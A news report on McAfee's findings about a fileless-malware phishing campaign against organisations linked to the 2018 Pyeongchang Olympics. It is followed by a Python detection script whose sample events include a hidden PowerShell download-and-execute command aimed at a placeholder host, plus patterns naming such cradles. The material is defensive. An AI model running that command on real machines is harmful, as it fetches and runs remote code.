The 2018 Olympic Winter Games will be held in Pyeongchang in February 2018 but malware attacks against the event have already begun.
According to McAfee researchers, attackers are already targeting the upcoming Winter Olympics in Pyeongchang, South Korea. McAfee's findings indicate that the attackers are hunting for sensitive data held by a range of groups connected to the Olympics.
In its report, the company said it had identified malicious emails being sent to organizations with some involvement in the Games. Who is responsible for sending these emails has yet to be identified. McAfee has warned of further attacks on organizations connected to the 2018 Games.
The report stated that the malicious emails were addressed primarily to ‘firstname.lastname@example.org’, while other South Korean organizations on the BCC line, including ski suppliers and ice hockey teams, were also among the key targets. Most of the organizations were linked in some way to the upcoming Games, some through the provision of infrastructure and others as support groups. The emails carried a malicious document that, once enabled, immediately opened a hidden back channel on the recipient's computer.
According to McAfee senior analyst Ryan Sherstobitoff, the attackers seem to be ‘casting a wide net with this campaign’ because they have included generic email addresses such as those beginning with info@.
He further noted: “Theoretically, if they get into the network hosting the Pyeongchang email network for the Olympics, they have any number of possibilities moving inside. It depends on where the networks are connected — to specific teams, committees, planners at a high level.”
The campaign, McAfee stated, has been running since 22 December and bears all the hallmarks of a Korean-speaking nation-state adversary. Because the investigation is still under way, the company did not name a probable perpetrator of the attacks.
This time the attackers used a more sophisticated method than a regular spear-phishing attack: the recipient does not need to download any file, and the malicious software is installed without being noticed by security software. This fileless malware is launched through Microsoft PowerShell, a tactic that has become very common among attackers.
The malicious emails are being sent from an IP address based in Singapore, and each email asks the recipient to open a Korean-language text file. The message looks legitimate because it appears to come from South Korea's National Counter-Terrorism Centre. Using steganography, the attackers hid the malware within images and text.
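As an added illustration (not part of the McAfee report or this article), the check below scores constructed Windows process-creation events for the pattern described above: an Office document spawning PowerShell with command-line flags typical of fileless execution. The event layout, sample paths and placeholder command lines are assumptions made for the example.

```python
import re
# Constructed sample process-creation events (not from the McAfee report):
# (parent image, child image, command line). Real events would come from
# Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing on.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Enc <BASE64_PLACEHOLDER>"),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/stage')\""),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe Get-Process"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line traits common to fileless launches: hidden window, base64
# encoded command, in-memory download-and-run, profile suppression.
SUSPICIOUS_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(parent, image, cmdline):
    """Score one event: an Office parent spawning PowerShell weighs 3 (a document
    has no business starting a shell); each suspicious flag adds 1."""
    if basename(image) not in POWERSHELL:
        return 0, []
    score, reasons = (3, ["office_parent"]) if basename(parent) in OFFICE_PARENTS else (0, [])
    for name, rx in SUSPICIOUS_FLAGS.items():
        if rx.search(cmdline):
            score, reasons = score + 1, reasons + [name]
    return score, reasons

def find_suspicious(events, threshold=3):
    """Return (index, score, reasons) for events scoring at or above threshold."""
    scored = [(i, *score_event(*e)) for i, e in enumerate(events)]
    return [hit for hit in scored if hit[1] >= threshold]
```

The two Office-spawned events score 6 and are flagged; the explorer- and cmd-launched administrative uses of PowerShell score 0 and are left alone.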
The timing of this campaign is significant, since North Korea has agreed to take part in high-level talks with South Korea. The first round of the détente begins soon, and the focus of the first meeting will be North Korea's potential participation in the 2018 Winter Olympics.